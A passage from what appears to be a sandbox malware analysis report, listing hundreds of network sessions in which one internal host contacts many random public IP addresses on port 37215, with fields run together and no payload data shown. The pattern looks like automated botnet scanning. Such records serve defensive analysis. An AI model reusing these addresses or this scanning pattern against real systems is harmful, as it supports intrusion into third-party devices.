                                              2671192.168.2.154313894.109.151.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2672192.168.2.1542044102.21.139.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2673192.168.2.154354245.231.198.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2674192.168.2.1541556181.92.4.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2675192.168.2.1546736157.203.6.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2676192.168.2.1541222197.150.48.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2677192.168.2.1554316122.157.21.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2678192.168.2.1533578156.140.70.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2679192.168.2.154723431.50.189.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2680192.168.2.1541374222.4.177.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2681192.168.2.153775237.107.192.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2682192.168.2.1547572156.141.196.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2683192.168.2.155771094.101.224.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2684192.168.2.155973034.220.187.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2685192.168.2.154114445.133.153.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2686192.168.2.1553262190.38.0.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2687192.168.2.1536630222.105.159.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2688192.168.2.1551890138.173.61.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2689192.168.2.1553372190.49.64.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2690192.168.2.1537774122.246.252.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2691192.168.2.1549102156.146.32.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2692192.168.2.1545558197.119.23.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2693192.168.2.156098641.254.214.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2694192.168.2.1545816138.225.241.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2695192.168.2.1544444186.208.108.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2696192.168.2.1539176222.221.173.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2697192.168.2.1533668121.253.181.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2698192.168.2.1553628138.101.15.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2699192.168.2.1554892186.181.99.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2700192.168.2.1549262222.243.242.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2701192.168.2.1546186156.229.86.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2702192.168.2.1558430102.191.118.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2703192.168.2.1556454157.174.50.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2704192.168.2.1544934121.27.170.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2705192.168.2.1536254181.128.93.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2706192.168.2.154074031.157.238.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2707192.168.2.1541584222.223.148.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2708192.168.2.1556358190.15.192.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2709192.168.2.153467094.207.205.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2710192.168.2.155404437.173.63.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2711192.168.2.1532944186.168.80.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2712192.168.2.1533864190.84.59.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2713192.168.2.1560570121.8.106.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2714192.168.2.155030237.228.139.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2715192.168.2.156064231.218.115.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2716192.168.2.153831241.158.126.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2717192.168.2.154425641.231.226.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2718192.168.2.1556584190.112.49.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2719192.168.2.155872070.134.93.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2720192.168.2.1558862181.150.210.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2721192.168.2.154716294.255.225.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2722192.168.2.1545076157.184.160.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2723192.168.2.1551634122.107.209.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2724192.168.2.1542764222.89.152.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2725192.168.2.1537592157.118.149.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2726192.168.2.155524894.83.39.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2727192.168.2.1534950186.183.177.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2728192.168.2.156047041.224.210.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2729192.168.2.1553946122.33.1.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2730192.168.2.1538478197.130.225.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2731192.168.2.1557534156.125.27.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2732192.168.2.1535750190.6.0.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2733192.168.2.1554404122.70.108.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2734192.168.2.1556886197.148.175.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2735192.168.2.1542272122.244.65.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2736192.168.2.155678241.88.154.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2737192.168.2.1555128222.250.221.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2738192.168.2.1557964197.173.197.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2739192.168.2.1540338186.215.217.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2740192.168.2.1554154186.69.19.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2741192.168.2.154691845.123.74.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2742192.168.2.1547026122.238.14.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2743192.168.2.153997045.140.215.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2744192.168.2.1533506138.48.24.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2745192.168.2.1560694181.145.217.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2746192.168.2.1559564122.225.160.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2747192.168.2.154339241.177.89.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2748192.168.2.155887037.50.34.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2749192.168.2.155019245.8.154.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2750192.168.2.1560306190.214.172.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2751192.168.2.1550218138.241.204.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2752192.168.2.1548160102.63.151.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2753192.168.2.1537838121.100.179.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2754192.168.2.1557326102.58.165.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2755192.168.2.1534826138.230.168.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2756192.168.2.1558792122.233.200.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2757192.168.2.1535958190.254.93.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2758192.168.2.155470641.112.99.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2759192.168.2.1540394121.157.188.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2760192.168.2.1543646181.154.123.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2761192.168.2.154031045.139.10.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2762192.168.2.1545820186.140.110.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2763192.168.2.154194831.158.152.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2764192.168.2.1554536121.141.196.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2765192.168.2.1536384197.191.66.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2766192.168.2.1546400156.105.197.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2767192.168.2.153401031.125.174.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2768192.168.2.1557120121.82.30.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2769192.168.2.1537476111.233.123.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2770192.168.2.1553844181.103.67.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2771192.168.2.1543346190.116.96.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2772192.168.2.1557222156.162.213.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2773192.168.2.155053841.185.209.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2774192.168.2.1557606222.70.105.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2775192.168.2.154599841.231.180.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2776192.168.2.1534136222.210.77.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2777192.168.2.1539432103.234.181.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2778192.168.2.1546410157.146.63.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2779192.168.2.1535728157.28.35.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2780192.168.2.1537908197.99.123.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2781192.168.2.1544618190.244.8.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2782192.168.2.1543678190.243.167.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2783192.168.2.1547042122.181.56.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2784192.168.2.154665441.166.139.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2785192.168.2.155425031.245.130.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2786192.168.2.155266641.13.44.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2787192.168.2.1559250190.149.240.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2788192.168.2.154969094.61.154.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2789192.168.2.153813858.61.253.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2790192.168.2.1558226138.22.98.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2791192.168.2.154718894.193.67.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2792192.168.2.1560936197.226.63.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2793192.168.2.1552398186.126.138.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2794192.168.2.1559818138.202.252.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2795192.168.2.155206637.38.66.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2796192.168.2.155661037.60.136.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2797192.168.2.1556428222.89.87.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2798192.168.2.1543850190.116.8.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2799192.168.2.1554390121.225.45.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2800192.168.2.1548462156.2.157.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2801192.168.2.1538144186.115.8.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2802192.168.2.1539764190.219.73.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2803192.168.2.1545024157.89.64.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2804192.168.2.153368241.146.198.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2805192.168.2.1533882190.76.203.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2806192.168.2.155495894.130.145.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2807192.168.2.1560970197.106.255.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2808192.168.2.154037694.130.45.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2809192.168.2.1541618157.125.173.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2810192.168.2.1560408121.242.176.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2811192.168.2.1552930138.214.93.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2812192.168.2.1558870156.52.46.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2813192.168.2.155373631.163.74.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2814192.168.2.154115441.71.89.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2815192.168.2.1534330186.208.64.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2816192.168.2.154286441.205.4.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2817192.168.2.1554058190.38.193.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2818192.168.2.1536374197.168.41.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2819192.168.2.154344245.235.78.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2820192.168.2.154756094.210.196.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2821192.168.2.155482837.115.214.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2822192.168.2.1540008156.87.128.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2823192.168.2.154915045.248.194.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2824192.168.2.1553728190.177.190.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2825192.168.2.1541688197.87.133.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2826192.168.2.1555904186.86.225.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2827192.168.2.1551608190.89.53.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2828192.168.2.1534482102.105.64.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2829192.168.2.153564845.183.170.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2830192.168.2.1546192181.88.69.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2831192.168.2.1560760197.32.35.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2832192.168.2.1550806138.170.178.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2833192.168.2.1537680222.206.116.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2834192.168.2.1540032156.63.170.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2835192.168.2.154302041.161.254.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2836192.168.2.1535182197.214.207.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2837192.168.2.1552876186.189.233.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2838192.168.2.1543190197.234.186.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2839192.168.2.153521645.238.49.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2840192.168.2.155787841.154.230.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2841192.168.2.1548620122.54.163.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2842192.168.2.155741468.160.251.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2843192.168.2.155659841.50.200.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2844192.168.2.155577694.195.95.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2845192.168.2.1546150197.137.144.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2846192.168.2.155346645.240.143.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2847192.168.2.154213437.17.130.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2848192.168.2.1545162181.68.222.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2849192.168.2.1542256222.36.241.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2850192.168.2.1551054138.238.29.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2851192.168.2.1552604181.90.17.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2852192.168.2.155815637.115.61.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2853192.168.2.1559274222.198.241.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2854192.168.2.1552088102.74.47.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2855192.168.2.154412487.160.214.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2856192.168.2.1554018138.7.51.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2857192.168.2.1545340190.46.231.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2858192.168.2.154507637.70.77.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2859192.168.2.1550340156.206.53.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2860192.168.2.154801031.109.0.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2861192.168.2.1543034190.160.228.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2862192.168.2.1548912156.49.129.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2863192.168.2.1550348181.101.80.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2864192.168.2.155969241.155.125.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2865192.168.2.154284852.222.215.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2866192.168.2.154461094.14.80.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2867192.168.2.1539486190.20.135.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2868192.168.2.155280845.213.68.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2869192.168.2.1543992138.225.159.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2870192.168.2.154991241.208.149.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2871192.168.2.1545416156.132.54.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2872192.168.2.1548610138.246.38.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2873192.168.2.1548698138.16.198.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2874192.168.2.155223294.155.226.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2875192.168.2.1553150223.194.44.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2876192.168.2.1549854157.151.100.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2877192.168.2.1554508156.96.198.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2878192.168.2.1556776222.173.150.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2879192.168.2.1540018186.120.145.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2880192.168.2.155934441.20.231.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2881192.168.2.1548816190.60.240.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2882192.168.2.154069241.8.189.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2883192.168.2.154210270.226.224.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2884192.168.2.1548844181.183.65.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2885192.168.2.155773245.97.25.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2886192.168.2.1551248157.192.242.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2887192.168.2.1539036197.50.83.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2888192.168.2.153387845.144.197.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2889192.168.2.1547784122.181.118.5937215
